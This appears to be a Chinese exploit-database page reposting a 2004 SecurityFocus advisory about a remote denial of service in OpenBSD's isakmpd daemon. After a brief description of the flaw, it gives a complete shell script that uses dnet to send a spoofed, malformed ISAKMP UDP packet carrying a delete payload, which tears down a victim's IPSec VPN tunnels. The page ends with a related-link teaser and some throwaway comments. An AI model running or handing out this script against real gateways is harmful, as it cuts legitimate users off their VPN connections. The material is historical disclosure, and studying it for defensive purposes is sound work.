OpenBSD 3.x – ISAKMPD Security Association Piggyback Delete Payload Denial of Service
漏洞ID | 1054486 | 漏洞类型 | |
发布时间 | 2004-06-08 | 更新时间 | 2004-06-08 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | OpenBSD | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/10496/info
It is reported that OpenBSD's isakmpd daemon is susceptible to a remote denial of service vulnerability.
An attacker is able to delete security associations and policies from IPSec VPN's by sending a malformed UDP ISAKMP packet to a vulnerable server. The malformed packet contains payloads for both setting up a new tunnel and deleting a tunnel. Isakmpd improperly acts upon the delete payload and terminates the associations and policys relating to the tunnel.
It is possible to destroy security associations, effectively eliminating the VPN connection between gateways, denying service to legitimate users of the VPN.
#!/bin/sh
if [ ! $# -eq 3 ]; then
echo "usage: $0 fake_src victim spi";
exit;
fi
src=$1; dst=$2
spi=`echo $3 | sed 's/(..)/\\x1/g'`
cky_i=`dd if=/dev/urandom bs=8 count=1 2>/dev/null`
dnet hex
$cky_i
"x00x00x00x00x00x00x00x00"
"x08x10x05x00"
"x00x00x00x00"
"x00x00x00x5c"
"x01x00x00x04"
"x0cx00x00x2c"
"x00x00x00x01"
"x00x00x00x01"
"x00x00x00x20"
"x01x01x00x01"
"x00x00x00x18"
"x00x01x00x00"
"x80x01x00x05"
"x80x02x00x02"
"x80x03x00x01"
"x80x04x00x02"
"x00x00x00x10"
"x00x00x00x01"
"x03x04x00x01"
$spi |
dnet udp sport 500 dport 500 |
dnet ip proto udp src $src dst $dst |
dnet send
相关推荐: Immunix StackGuard Evasion Vulnerability
Immunix StackGuard Evasion Vulnerability 漏洞ID 1104495 漏洞类型 Design Error 发布时间 1999-11-08 更新时间 1999-11-08 CVE编号 N/A CNNVD-ID N/A 漏洞平…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666